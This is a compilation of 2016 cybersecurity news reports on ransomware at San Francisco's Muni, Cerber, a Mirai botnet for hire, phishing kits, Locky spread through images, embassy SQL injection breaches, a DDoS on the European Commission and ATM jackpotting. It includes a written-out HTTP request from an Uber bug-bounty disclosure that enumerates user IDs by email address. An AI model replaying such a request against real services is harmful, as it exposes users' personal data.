Rakouské ministerstvo vnitra v současnosti navíc prověřuje, zda za obdobným hackerským útokem na centrální banku nestojí rovněž Turci.

San Francisco Metro System Hacked with Ransomware; Resulting in Free Rides
28.11.2016 thehackernews

Nothing is immune to being hacked when hackers are motivated.
The same proved by hackers on Friday, when more than 2,000 computer systems at San Francisco's public transit agency were apparently got hacked.
San Francisco's Municipal Transportation Agency, also known as MUNI, offered free rides on November 26th after MUNI station payment systems and schedule monitors got hacked by ransomware and station screens across the city started displaying a message that reads:
"You Hacked, ALL Data Encrypted. Contact For Key( ,Enter."
According to the San Francisco Examiner, MUNI confirmed a Ransomware attack against the station fare systems, which caused them to shut down ticket kiosks and make rides free this weekend.
As you can see, the above message delivered by the malware followed by an email address and ID number, which can then be used to arrange ransom payments.
MUNI Spokesman Paul Rose said his agency was investigating the matter and "working to resolve the situation," but did not provide details as of how MUNI got hacked.
"We are currently working to resolve the situation," said Rose. "There is an ongoing investigation, and it wouldn’t be appropriate to provide additional details."
Pay $73,000 to Free Systems from Ransomware
Trains themselves were not affected by the malware attack, and the MUNI claimed that the payments were resumed on the morning of November 27th. The MUNI looks after trains, trams and buses around the city, including San Francisco's iconic cable cars.
It is yet not clear exactly who was responsible for the attack (besides a pseudonym "Andy Saolis"), but according to local media reports, the agency's computers were being held by ransomware until the MUNI paid the equivalent of more than $73,000 in Bitcoin.
Andy Saolis is a pseudonym commonly used in HDDCryptor ransom attacks, which uses commercial tools to encrypt hard drives and network shares on Windows machines using randomly generated keys and then overwrite the hard disks' MBRs to prevent systems from booting up properly.
The target machine is typically infected by accidentally opening a malicious executable in an email or download, and then the malware spreads out across the network.
The email address,, used by anonymous criminal points the city to a Russian email address to arrange payment and has been linked to other cyber attacks as well.
The Hacker Linked to a Previous Ransomware Starin
When reaching at the provided email, the hacker provided a statement in broken English, which read:
"We don't attention to interview and propagate news! Our software working completely automatically and we don't have targeted attack to anywhere! SFMTA network was Very Open and 2000 Server/PC infected by software! So we are waiting for contact any responsible person in SFMTA but I think they don't want deal ! so we close this email tomorrow!"
The same email address,, was linked to a ransomware strain called Mamba in September. The ransomware employs tactics similar to those demonstrated against the MUNI systems.
The hacker provided Hoodline a list of systems the hacker claimed to have infected in Muni's network, which came out to be 2,112 of the total 8,656 computer networks. The hacker also said that the MUNI had "one more day" to make a deal.
Not much about the hack is known; the extent of the hack and hacker's identity remain a mystery for now, but the incident once again reminds us that how vulnerable our critical infrastructure remains.

Two versions of the new Cerber 5.0 ransomware released in a few days
28.11.2016 securityaffairs

Security experts from the CheckPoint firm discovered two different variants of the new Cerber 5.0 ransomware in a few weeks.
Security experts have spotted a new variant of the dreaded Cerber ransomware, the Cerber 5.0. This is the third version of the malware released this week that is able to encrypt files on all accessible network shares.

The Cerber ransomware was first spotted in March, since then it rapidly evolved. In June, Cloud security provider Avanan spotted a number of Cerber Ransomware variants that were targeting corporate Office 365 users with spam or phishing emails leveraging on malicious file attachments.

Cerber 2.0 was spotted in August when it was offered in the criminal underground via the ransomware-as-a-service model.

The Cerber 4.0 appeared in the wild in October, in the same month experts observed it killing common database-related processes like those of the MySQL, Oracle and Microsoft SQL servers to encrypt files.

The Cerber 4.0 appeared in the wild delivered by several exploit kits, including RIG, Neutrino, and Magnitude EKs.

The Cerber 4.0 is becoming very popular in the criminal ecosystem where it is still used to power several malvertising campaigns.

The latest, the Cerber 5.0 variant, included a .vbs file with a VBScript that implements a communication channel between victims and crooks.

Last week experts from CheckPoint security observed a rapid sequence of versions being released in the wild. Less than 24 hours after the release of the version 4.1.6, crooks distributed the Cerber 5.0 and the 5.0.1.

“Only yesterday (November 23rd, 2016) a new version of Cerber was released (4.1.6); however no prominent changes were noticeable in it. Less than 24 hours later, Cerber released the new version, 5.0, which is described in this article.” reads the analysis published by the firm CheckPoint.

“A notable change introduced in this Cerber version is the new IP ranges used for command and control communication. Cerber uses one IP range which was also used in its last version (4.1.6), while the rest of the IP ranges are new.”

The Ceber 5.0 leverages new IP ranges for the command and control (C&C) communication, only one of them was exploited in version 4.1.6. The malicious code multicasts messages to all IP addresses via UDP.

Cerber is currently distributed via spam e-mail campaigns and exploit kits, mostly Rig-V Exploit Kit. The malware uses randomly generated extensions for the encrypted file (4 random alphabetic letters).

Cerber informs victims which version of the ransomware they’ve been encrypted by, via a ransom note dropped on the desktop.

cerber 5.0

Experts from CheckPoint security speculate that Cerber creators constantly improve their code to avoid security vendors’ counter-measures.

There is no doubt, Cerber 5.0 will have many other successors.

Hacker who exposed Steubenville Rape Faces longer Prison term than Rapists
28.11.2016 thehackernews Hacking
Remember Steubenville High School Rape Case?
In 2012, Steubenville (Ohio) high school's football team players gang-raped an unconscious teenage girl from West Virginia and took photographs of the sexual assault.
In December 2012, a member of the hacker collective Anonymous hacked into the Steubenville High School football fan website Roll Red Roll and leaked some evidence of the rape, including a video taken and shared by the crime's perpetrators in which they joked about the sexual assault.
The hack exposed information about the gang rape by two football team players — Trent Mays and Ma’lik Richmond, both 16 at the time of the crime — who were eventually convicted and sentenced in 2013 to 2 and one years behind bars, respectively, but have since been released.
In 2013, the FBI raided the home of Deric Lostutter — Anonymous member, also known online as "KYAnonymous" — and seized two laptops, flash drives, CD's, an external hard-drive, cell phones and an XBox, and arrested him.
Lostutter, a 29-year-old man from Winchester, pleaded guilty in federal court in Kentucky on Wednesday to one count of conspiring to illegally break into the computers to draw attention to the Steubenville rape case without authorization and one count of lying to an FBI agent.
What's weird? The hacker is facing a longer prison term than the rapists.
Lostutter said he hacked into the site with just an intention to expose information about the gang rape. He said in court Wednesday, "We wanted to stand up for a girl who had no voice, and we went about it the wrong way," according to WTVQ.
However, prosecutors alleged that Lostutter participated in an online campaign against the school in late 2012 under the banner of Anonymous. They also said Lostutter used the online alias KYAnonymous to conspire online with other hacktivists in December 2012.
According to prosecutors, the goal was to intimidate and harass an individual who ran Roll Red Roll, the website dedicated to the football team. Lostutter gained unauthorized access to the target's website and leaked its owner's personal emails online.
There's no doubt that the operation against the school website helped bring the Steubenville rape case into the national spotlight. But Lostutter was questioned over his participation after the campaign got off the ground.
"Lostutter filmed a video wearing a mask and wrote a manifesto, which was both posted on the website to harass and intimidate people, and to gain publicity for Lostutter and [Noah] McHugh's online identities," said the protectors.
"Specifically, the messages threatened to reveal personal identifying information of Steubenville High School students, and made false claims that the administrator of the fan website was involved in child pornography and directed a 'rape crew.'"
Lostutter faces a maximum sentence of 10 years in prison and $250,000 in fines. He is scheduled to appear before the judge for sentencing on March 8, 2017. His defense did not comment on the plea agreement.
Noah McHugh, co-conspirator of Lostutter, was pleaded guilty in September to hacking the Steubenville website. He is slated to be sentenced in December.

Hackers crashed San Francisco’s Municipal railway systems
28.11.2016 securityaffairs Hacking

Last week, unknown attackers hacked the computer systems of the San Francisco’s Municipal railway giving riders a free ride all day on Saturday.
Last week, hackers crashed the computer system of the San Francisco’s Municipal railway, unknown attackers took offline the ticket kiosks offline and gave riders a free ride all day on Saturday, until Sunday morning.

Computers at the San Francisco Muni station computers displayed the message “You Hacked” on Saturday.

According to a spokesperson, the San Francisco’s Muni rail system “opened the fare gates as a precaution to minimize customer impact.”

According to San Francisco’s CBS affiliate, the system had been hacked for days.

Hackers also breached the Muni’s email system and rumors say employees weren’t sure if they would get paid this week.

“Meanwhile, riders will continue to find the metro gates open, and the system is not reading their payment cards. The fare gates were still wide open Saturday at 6 p.m. at the Embarcadero Station.” reported the San Francisco’s CBS affiliate.

“Ticket kiosks were also out of service.”

San Francisco’s Municipal railway hacked hacked

The San Francisco Municipal Transportation Agency, SFMTA, confirmed the cyber attack, but it confirmed that the incident has not affected any service.

A spokesperson with the transit agency tells KPIX 5 it is an ongoing investigation.

“There’s no impact to the transit service, but we have opened the fare gates as a precaution to minimize customer impact,” said Muni spokesperson Paul Rose. “Because this is an ongoing investigation it would not be appropriate to provide additional details at this point.”

“I think it is terrifying,” said one rider. “I really do I think if they can start doing this you know here, we’re not safe anywhere.”

“I was like, is this part of Black Friday deal, or something?” added another.

Sources confirmed the investigation is ongoing, but at the time I was writing the experts at the transit agency have no idea who is responsible for the cyber attack.

Hackers offer a huge Mirai botnet as a DDoS-for-hire service
28.11.2016 securityaffairs

The hackers Popopret and BestBuy are offering a DDoS-for-hire service leveraging a Mirai botnet composed of around 400,000 compromised devices.
We have written a lot about the Mirai botnet after the clamorous attacks against the Dyn DNS service and the OVH hosting, it is a dangerous threat that was designed to target IoT devices that could be used to power massive DDoS attacks.

The Mirai botnet is becoming very popular in the criminal underground, so it is natural that crooks started offering it as a DDoS hire service to other cyber criminals.

The hackers Popopret and BestBuy are offering a DDoS-for-hire service leveraging a Mirai botnet composed of around 400,000 compromised devices.

We recognize BestBuy as the author of the GovRAT malware that offered the source code of his threat, including a code-signing digital certificate, for nearly 4.5 Bitcoin on the TheRealDeal black market.

Popopret was linked by experts from threat intelligence firm InfoArmor to Bestbuy, the researchers pointed out that Bestbuy started using also the moniker “Popopret.”

The RAT was delivered through spear-phishing and drive-by downloads attacks. Among the victims, government and military organizations. Stolen data from military organizations were also offered for sale on the black market.

Catalin Cimpanu from Bleeping Computer published an interesting post that confirms that the two monikers Popopret and BestBuy (it is not clear if they are the same person) are renting access to a Mirai botnet composed of more than 400,000 infected bots, the largest one till date offered for rent.

“Two hackers are renting access to a massive Mirai botnet, which they claim has more than 400,000 infected bots, ready to carry out DDoS attacks at anyone’s behest.” wrote Companu.

This botnet offered by Popapret and BestBuy represents an evolution of the original Mirai botnet because it included new features like SSH supported brute-force attacks to exploit zero-day vulnerabilities.

The experts at the Bleepingcomputer highlighted the fact that this Mirai botnet isn’t cheap because Popopret requests its customers to rent it for a minimum period of two weeks.

“Price is determined by amount of bots (more bots more money), attack duration (longer = more money), and cooldown time (longer = discount),” Popopret told Bleeping Computer.

Customers could get a discount if they rent the Mirai botnet for long DDoS cooldown time, which is the time between two consecutive DDoS attacks.

“DDoS botnets use cooldown times to avoid maxing out connections, filling and wasting bandwidth, but also preventing devices from pinging out and disconnecting during prolonged attack waves.” reported BleepingComputer.

Popopret provided an example of price for this Mirai Botnet, 50,000 bots with attack duration of 3600 secs (1 hour) and 5-10 minute cooldown time goes for roughly 3-4k per 2 weeks. The experts highlighted that the service is very expensive.

The botnet is controlled through a console hidden on the Tor network that could be accessed via Telnet.

mirai botnet for-rent
Source: Bleeping Computer

The hackers Popopret and BestBuy declined to run a test in order to show real capabilities of their botnet.

You can monitor the Mirai botnet with the following tracker.

Scammers advertise backdoored phishing templates on YouTube
27.11.2016 securityaffairs

Security experts from Proofpoint firm observed scammers exploiting YouTube to promote their backdoored phishing templates.
According to experts from the security firm Proofpoint, scammers are advertising on YouTube backdoored phishing templates offering also “how-to” videos and manuals.

It is not a novelty, cyber criminals are switching on legitimate websites to propose their products and services.

Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube, a query for “paypal scama” returns over 114,000 results.

The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.

“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.

The videos show the appearance of the templated and provide instruct to the potential buyers on how to steal information from the victims with phishing attacks.

The post shows as an example of these malicious kits, an Amazon phishing template that replicates the legitimate login page of the popular website.

The researchers downloaded one of the kits advertised on YouTube and analyzed it discovering that the clumsy scammer left his Gmail address hardcoded in the template alongside with an email address used to receive the stolen credentials from the template.

youtube phishing templates

The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.

“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.

The researchers noticed that many videos have been posted for months, a circumstance that suggests the lack of filtering mechanisms implemented by YouTube.

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.

The Most Secure Smartphones – Holiday Edition
27.11.2016 securityaffairs Mobil

Unfortunately, many smartphones have never been designed with security in mind, which are the most secure smartphones? Enjoy it!
In general, smartphones have never been designed with security in mind. The emphasis has always been on features and capabilities while security is usually relegated to the back burner. And, while no internet-connected device is 100% secure, a few smartphones stand out as the best contenders for mobile security.

Secure Smartphones

BlackBerry DTEK50
BlackBerry describes the DTEK50 smartphone as the “world’s most secure Android smartphone.” The DTEK50 includes features such as periodic application tracking, which automatically monitors the OS and apps. This feature also notifies you when your privacy could be at risk and informs you as to what actions you can take.

The DTEK50 also has the ‘Password keeper’ app which allows you to store all your important passwords in an encrypted space, which itself is protected by a single password which.

View more information on Blackberry’s DTEK50’s features and specifications.

Boeing Black
Boeing Black is the fruit of a collaborative effort between Boeing and BlackBerry. Designed with government agencies in mind, Boeing Black is capable of encrypting calls. It also comes with a self-destruct feature which ensures that any attempt to break into the device sets off the auto-deletion of all data and software, making the phone inoperable.

View more information on Boeing Black’s features and specifications.

Turing Phone
The Turing Phone is made of Liquidmorphium, an amorphous alloy of zirconium, aluminium, copper, silver and nickel. According to its manufacturer, the Turing Phone is “unbreakable.” It runs Android 5.1 Lollipop, along with Turing’s own security-focused UI on top, for end-to-end encryption.

View more information on Turing Phone’s features and specifications.

Blackphone 2
Released by Silent Circle, the Blackphone 2 is the company’s Silent OS, an operating system based on Android, but with enhanced privacy features.

The Economic Times reports that the “OS offers an ‘Enterprise Spaces’ feature that creates multiple, separate virtual devices on one device. The company claims to have the ‘world’s fastest vulnerability management,’ which raises critical vulnerabilities within 72 hours of their detection or reporting.

The updates and patches come directly from Silent Circle, with no carrier delays or waiting periods.Major specifications of the Blackphone 2 include a 5.5-inch Full HD display with Gorilla Glass protection.”

blackphone Secure smartphone

View more information on Blackphone 2’s features and specifications.

Solarin is manufactured by Israeli startup Sirin Labs and is priced at over $14,000. According to Sirin Labs, the phone features “the most advanced privacy technology, currently unavailable outside the agency world.”

It features 256-bit AES encryption which is similar to what some militaries use to secure their communications. Solarin also has a physical security switch, located on the back of the phone, which can be activated as needed.

View more information on Solarin’s features and specifications.

FreedomPop Private Phone
Utilizing the same hardware components that are on the Samsung Galaxy S2, this smartphone from cellular company, FreedomPop, is Android-based and focused on privacy. Nicknamed the “Snowden phone,” it features 128 bit enciphering when calls are made and an anonymous browsing process. It can be purchased anonymously with BitCoin.

View more information on the FreedomPop Private Phone’s features and specifications.

Sectera Edge
Definitely not a looker, Sectera Edge nonetheless is a favorite of the U.S. Department of Defense. Created by General Dynamics, it runs a significantly modified version of Windows and features a button-based keyboard and a price tag of over $3000.

View more information on the Sectera Edge’s features and specifications.

Two Popular Phones That Didn’t Make The List

According to Elcomsoft, a Russian forensics company, Apple dropped the ball on password security with its latest iPhone operating system. These professional iPhone hackers said that Apple has made cracking the logins for backups stored on a Mac or PC a lot easier.

Elcomsoft discovered that Apple was using a weaker password protection mechanism, for manual backups via iTunes, than before:

“Thanks to Apple’s mistake, Elcomsoft said it could potentially guess backup passwords 40 times faster using CPU acceleration when compared to the speedier GPU-powered cracking in iOS 9. When using the same Intel i5 CPU for cracking efforts, it was an astonishing 2500 times faster, with 6 million password guesses per second compared to just 2,400. The company thinks it has an 80 to 90 per cent chance of successfully getting the right password with its tools, which can be bought by anyone, not just the cops.

‘We discovered an alternative password verification mechanism added to iOS 10 backups. We looked into it and found out that the new mechanism skips certain security checks, allowing us to try passwords approximately 2500 times faster compared to the old mechanism used in iOS 9 and older.’”

Apple opted for a weaker hashing algorithm for local backups of iPhone files stored on PCs. “Such algorithms turn a plaintext password into a ‘hash’ — a string of numbers and letters. Password crackers attempt to guess the output, or hash, of the algorithm and match it with plaintext; so, the more complex the algorithm and the more complex the password, the harder it is to find a match.”

While there are obstacles to carrying out an attack under these circumstances, it is not outside the realm of possibilities. It simply means a hacker would have to gain access to the computer on which the iPhone files are stored. Additionally, the iPhone user would have also had to have turned on local backups instead of using iCloud. A hacker could access the linked computer either by physically extracting the data or by compromising the machine in some other manner, such as hacking it remotely.

If, however, a hacker has physical access to both phone and laptop, according to Elcomsoft, it is possible to “force a phone into creating a backup on the phone and it may be possible ‘to produce a local backup even if the phone is locked by using a pairing record extracted from a trusted computer.’”

That being said, Google’s highly anticipated and heavily promoted Pixel has already been hacked–by a team of Chinese hackers at the 2016 PwnFest. It took the hackers less than a minute to hack the phone. Google is working on a patch for the vulnerability.

Frustrated with Google’s seeming resistance to providing ample security measures on Android phones, The Tor Project recently announced the release of its prototype for a Tor-enabled smartphone. Ars Technica describes it as “an Android phone beefed up with privacy and security in mind, and intended as equal parts opsec kung fu and a gauntlet to Google.”


Designed by Tor developer Mike Perry, it is based on Copperhead OS, a hardened Android distribution.

Copperhead OS was the obvious choice for the prototype’s base system, Perry explained to Ars Technica. “Copperhead is also the only Android ROM that supports verified boot, which prevents exploits from modifying the boot, system, recovery, and vendor device partitions,” he said in a blog post. “Copperhead has also extended this protection by preventing system applications from being overridden by Google Play Store apps, or from writing bytecode to writable partitions (where it could be modified and infected).”

Ars Technica reports:

“’The prototype is meant to show a possible direction for Tor on mobile,’ Perry wrote in a blog post. ‘We are trying to demonstrate that it is possible to build a phone that respects user choice and freedom, vastly reduces vulnerability surface, and sets a direction for the ecosystem with respect to how to meet the needs of high-security users.’

To protect user privacy, the prototype runs OrWall, the Android firewall that routes traffic over Tor, and blocks all other traffic. Users can punch a hole through the firewall for voice traffic, for instance, to enable Signal.

The prototype only works on Google Nexus and Pixel hardware, as these are the only Android device lines, Perry wrote, that ‘support Verified Boot with user-controlled keys.’ While strong Linux geekcraft is required to install and maintain the prototype, Perry stressed that the phone is also aimed at provoking discussion about what he described as ‘Google’s increasing hostility towards Android as a fully Open Source platform.’”

Perry argues that in trying to resolve security, Google is encroaching on user civil liberties and causing Android to be more susceptible to compelled backdoors. He is also concerned about the lack of transparency in Google’s release and development process.

Perry has vehemently stated the Tor Project has no plans to move into the hardware business. He just wants this prototype to inspire innovation.The prototype, nicknamed “Mission Improbable,” can now be downloaded and installed. And, Mission Improbable installation instructions on can be accessed on GitHub.

Hacker found issues in Uber UberCENTRAL Tool that exposed user data
26.11.2016 securityaffairs Hacking

Bounty hunter Kevin Roh has discovered several security vulnerabilities in the Uber UberCENTRAL Tool that exposed user data.
Security expert and bounty hunter Kevin Roh has discovered several security vulnerabilities in Uber’s UberCENTRAL Tool that exposed user data.

The UberCENTRAL service was launched in July, according to the company it is a dashboard that enables any business to request, manage, and pay for multiple Uber rides on behalf of their customers.

The UberCENTRAL console could be used by operators (i.e. employees) who can request rides for their customers. Administrators can easily add operators using only their email address.

Roh described in a blog post the flaws he discovered during his tests.

The first flaw allows enumerating userUUID via emails, an attacker can send requests with possible email addresses and if the address is associated with an account the server will include the user’s UUID in the response.

If the email address is not valid, the response sent by the server will contain an error.

Below an example of request sent to the server:

POST /admin/api/organizations/[organizationUUID]/operators HTTP/1.1 Host: Connection: close Content-Length: 40 Accept: application/json Origin: x-csrf-token: XXXX x-uber-origin: web-central-admin User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Type: application/json Referer: Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.8 Cookie: _ua=XXXX {"operatorEmail":"r****"}

The attacker could write a simple script that tries all possible values for the ‘operationEmail‘ parameter and analyze all the responses received by the server for each of them.


The second flaw is similar to the first one, it allows enumerating userUUID via GET request instead email addresses.

Roh found a third flaw that could have been exploited to obtain much more data, including full name, phone numbers, emails and userUUID.

The vulnerabilities were reported to the company between September and October, and the company promptly patched them in October.

Uber awarded the expert Roh under the company bounty program. The hacker received hundreds of dollars for each of the vulnerabilities, the exact amounts have not been revealed.

ImageGate: nová metoda šíření malwaru prostřednictvím obrázků

26.11.2016 SecurityWorld Viry
Check Point Software Technologies identifikoval nový vektor útoků pojmenovaný ImageGate, který vloží malware do obrázků a grafických souborů. Navíc výzkumníci odhalili způsob, jak hackeři šíří škodlivý kód pomocí těchto obrázků na sociálních sítích, jako jsou Facebook a LinkedIn.

Podle výzkumu útočníci vytvořili novou techniku, jak vložit škodlivý kód do obrazového souboru a úspěšně jej nahrát na webové stránky sociálních sítí. Útočníci zneužívají nesprávné konfigurace v infrastruktuře sociálních médií, aby přinutili oběti ke stažení obrazového souboru. A jakmile koncový uživatel klikne na stažený soubor, tak dojde k infikování zařízení.

Celý bezpečnostní průmysl v posledních čtyřech dnech pozorně sleduje masivní šíření ransomwaru Locky prostřednictvím sociálních sítí a zejména prostřednictvím facebookové kampaně. Check Point věří, že nová technika ImageGate odhaluje, jak byla tato kampaň vůbec možná, což byla doposud nezodpovězená otázka.

Výzkumníci společnosti Check Point odhalili útok, který ovlivňuje hlavní internetové stránky a sociální sítě po celém světě, včetně Facebooku a LinkedInu. Check Point o útoku informoval Facebook a LinkedIn na začátku září.

Jakmile v případě ransomwaru Locky uživatel stáhne a otevře škodlivý soubor, všechny soubory na jeho osobním zařízení se automaticky zašifrují a přístup k nim lze znovu získat pouze zaplacením výkupného. Podle odhadů je útočná kampaň stále v plném proudu a každý den přibývají nové a nové oběti.

„Stále více lidí tráví čas na sociálních sítích, proto se hackeři pokouší najít cestu právě do těchto platforem,“ říká Oded Vanunu, vedoucí výzkumu produktových zranitelností, Check Point. „Kyberzločinci si dobře uvědomují, že tyto stránky jsou obvykle povolené, takže se snaží najít nové techniky, jak využít sociální média pro škodlivé aktivity. Výzkumníci společnosti Check Point se snaží zjistit, kde útočníci udeří příště, aby ochránili uživatele před nejpokročilejšími hrozbami.“

Jak se chránit:

Check Point doporučuje následující preventivní opatření:

Pokud jste klikli na obrázek a váš prohlížeč začal stahovat soubor, neotvírejte jej. Jakékoliv webové stránky sociálních sítí by měly zobrazit obrázek bez stažení jakéhokoli souboru.
Neotvírejte žádný obrázkový soubor s neobvyklou příponou (jako jsou SVG, JS nebo HTA).

Beware! Malicious JPG Images on Facebook Messenger Spreading Locky Ransomware
26.11.2016 thehackernews
If you receive an image file sent by someone, even your friend, on your Facebook Messenger, LinkedIn or any other social media platform, just DO NOT CLICK ON IT.
Even JPG image file could eventually infect your computer with the infamous Locky Ransomware.
Earlier this week, we reported a new attack campaign that used Facebook Messenger to spread Locky Ransomware via .SVG image files, although Facebook denied this was the case.
Now, researchers have discovered that the ongoing spam campaign is also using boobytrapped .JPG image files in order to download and infect users with the Locky Ransomware via Facebook, LinkedIn, and other social networking platforms.
Security researchers from Israeli security firm Check Point have reportedly discovered how cyber criminals are hiding malware in image files, and how they are executing the malware code within these images to infect social media users with Locky variants.
According to researchers, malware authors have discovered security vulnerabilities in the Facebook and LinkedIn that forcibly download a maliciously coded image file on a user's computer, though in some cases, the user has to click on the image file to download.
When the user detect the automatic download and access that malformed image file, malicious code installs the Locky ransomware onto the user's computer, which encrypts all files on the infected computer until a ransom is paid.
Flaws in Facebook and LinkedIn Remain Unpatched
The security firm has declined to provide technical details as the vulnerability the malware relies on still impacts both Facebook and LinkedIn, among other unnamed web services.
"The attackers have built a new capability to embed malicious code into an image file and successfully upload it to the social media website," Check Point researchers say.
"The attackers exploit a misconfiguration on the social media infrastructure to deliberately force their victims to download the image file. This results in infection of the users' device as soon as the end-user clicks on the downloaded file."
CheckPoint says the firm reported the issue to both Facebook and LinkedIn back in September, but the vulnerabilities remain unpatched in both the platform, which is now actively being exploited by attackers.
Video Demonstration of the Attack
You can also watch the video demonstration of this attack, which CheckPoint dubbed ImageGate, which shows the attack in action.

Locky is Spreading Massively via Social Media Platform
Locky ransomware has been around since early this year and has become the biggest and most common ransomware family known today. It works by encrypting victims' files with RSA-2048 and AES-1024 algorithms and demands a ransom for the key.
Locky ransomware mainly spreads via phishing emails containing a malicious attachment disguised as a Word or Zip file. But since people spend time on social network sites, cyber crooks have turned their focus to finding a way into these platforms.
Check Point says that in the past week, they have noticed a "massive spread of the Locky ransomware via social media, particularly in its Facebook-based campaign."
To keep yourself safe, you are advised not to open any unsolicited file that has automatically downloaded onto your computer, especially image files with unusual extensions like SVG, JS, or HTA.
The bottom line: Don't be curious to look at image sent by someone, at least for the time being.

Kapustkiy joins the Powerful Greek Army and hacked High Commission of Ghana & Fiji in India
26.11.2016 securityaffairs Hacking
Kapustkiy hacked the High Commission of Ghana & Finland in India, he also confirmed to have joined the Powerful Greek Army hacked crew.
Last week, the hacker Kapustkiy, one of the most active hackers at this moment, hacked the India Regional Council, today he sent me a message to announce to have hacked the High Commission of Ghana & Finland in India.

The hacked archives are:, Database: jadon_ghana, Database: jadon_hcfiji

The hacker has found other SQLi flaws in the above websites and the way to exploit them to access their databases. The database contains users’ personal information, including real names, phone numbers and email.

Among the first hacks of Kapustkiy there is are the data breach of Indian embassies across the worlds, a few weeks later the young hacker decided to verify if the flaws were fixed after his disclosure.

“I was curious about the Indian Embassy if they had fix everything that they promised to me. So I’ve found two sites that were related to the Indian Embassy” ha told me.

Kapustkjy published a small portion of the compromised databases on Pastebin. The hackers announced that he is now a member of the Powerful Greek Army hacker group.

Below the manifesto published by the hacker:

“DISCLAIMER: Don’t leak this somewhere else and don’t claim that it is your work

And don’t abuse this information. This is only to let adminstrators to see the danger of a weak website with no security and what the consequence are. I have reported the vulnerable.





Contact them about the vulnerability please: &”

Kapustkiy is a seventeen years old pentester that is targeting organizations and embassies across the world. Recently he breached the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (, and a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya. Kapustkiy and his friend Kasimierz (@Kasimierz_).

He also targeted Universities, including two subdomains of Virginia University & Sub domain of University of ( ) and another embassy, the Indian Embassy in New York ( )

The Indian authorities have issued a public statement to thank the young hacker for exposing the vulnerabilities in their websites.

“Thank you for your advice,” said Sanjay Kumar Verma, Joint Secretary, eGovernance and Information Technology. “We are fixing codes one by one. Your help in probing websites of various Indian embassies is a great help.”

The administrators of the Italian website also thanked him,

A massive DDoS attack hit the servers of the European Commission for several hours

25.11.2016 securityaffairs Attack

The European Commission was the victim of a massive DDoS attack that brought down its internet access for hours on Thursday.
A massive DDoS attack targeted the European Commission website, fortunately, according to an official statement from the organization the internal security team repelled the attack without damages.

The experts from the European Commission confirmed that some servers hit by the DDoS attack went offline causing an outage that lasted a few hours.

european commission building-flags

The European Commission informed internal staff of the attack via email and it explained that the malicious volume of traffic caused “the saturation of our Internet connection.”

“No data breach has occurred,” a Commission spokesperson was quoted by the Politico. “The attack has so far been successfully stopped with no interruption of service, although connection speeds have been affected for a time.”

Employees claim Internet was down following the attacks

The attack occurred yesterday and according to an employee, the internal staff was not able to work during the afternoon.

“no one could work this afternoon, since the Internet was gone twice, for several hours.” said the source.

At the time I was writing there are no technical details of the DDoS attack, the responsible is still unknown neither the motivation of the offensive.

The European Commission is currently investigating the case.

Insiders confirmed that security experts at the European Commission expected new waves of cyber attacks in the coming days. The European cyber emergency response team (CERT-EU) was already alerted and it is working with the IT security team at the European Commission to repeal any attack.

The aforementioned source notes that in addition to the traffic that hackers submitted to the EU website, the Commission also experienced attacks specifically aimed at network gateways, and this is the main reason that caused Internet connections used by employees to go down.

Crooks steal millions from European ATMs with jackpotting attacks
25.11.2016 securityaffairs Hacking

Criminal gangs like the Cobalt gang are now focusing their efforts on the banks to steal cash directly from the ATMs with jackpotting attacks.
Security experts are assisting a change of tactics for the criminal organizations who target the ATMs and online banking credentials. Crooks are now focusing their efforts on the banks in the attempt to steal cash directly from the ATMs.

In the last months, cyber criminals targeted ATM machines in Taiwan and Thailand, in both cases, crooks used a malware to infect the machine and have instructed them on spitting out cash on demand. The principal ATM manufacturers, Diebold Nixdorf and NCR Corp., confirmed to be aware of the ATM attacks and had already been working with their customers to mitigate the threat.

“We have been working actively with customers, including those who have been impacted, as well as developing proactive security solutions and strategies to help prevent and minimize the impact of these attacks,” said Owen Wild, NCR’s global marketing director for enterprise fraud and security.

This technique is known as ATM jackpotting, the FBI has warned U.S. banks of the potential attacks.

The FBI confirmed in a bulletin earlier this month that it is “monitoring emerging reports indicating that well-resourced and organized malicious cyber actors have intentions to target the U.S. financial sector.”

According to law enforcement, the malware used in the attack could be a product of the Buhtrap ATM gang, which stole 1.8 Billion rubles ($28 Million) from Russian banks between August 2015 and January 2016.

The cyber security firm Group-IB who investigated the string of ATM jackpotting attack confirmed that cyber criminals have remotely infected ATMs with malware in more than dozen countries across Europe this year. The name of targeted banks was not disclosed, but the researchers confirmed the victims were located in Armenia, Bulgaria, Estonia, Georgia, Belarus, Kyrgyzstan, Moldova, Spain, Poland, the Netherlands, Romania, the United Kingdom, Russia, and Malaysia.
According to Group-IB, crooks have been targeting ATMs for at least five years, but the recent wave of attacks mostly targeted small numbers of ATMs because criminals have to physical access to the machines.

“To perform a logical attack, hackers access a bank’s local network, which is further used to gain total control over ATMs in their system. Cash machines are then remotely triggered to dispense money, allowing criminals to steal large amounts with relative ease. With full control over ATMs, criminals can choose the exact attack time to loot newly filled ATMs.” states the report from Group-IB. “This results in millions of dollars lost, as in the case of the First Bank. That said, such attacks do not require developing expensive advanced software – a significant amount of tools used by the hackers is widely available from public sources, as will be further covered later in this report. ”

Group-IB attributed the attacks against the ATMs across Europe to a single criminal group, dubbed Cobalt.

The group launched spear phishing attacks with a malicious attachment in order to infect systems in the target banks. The emails purport to come from the European Central Bank, the ATM maker Wincor Nixdorf, or other banks.

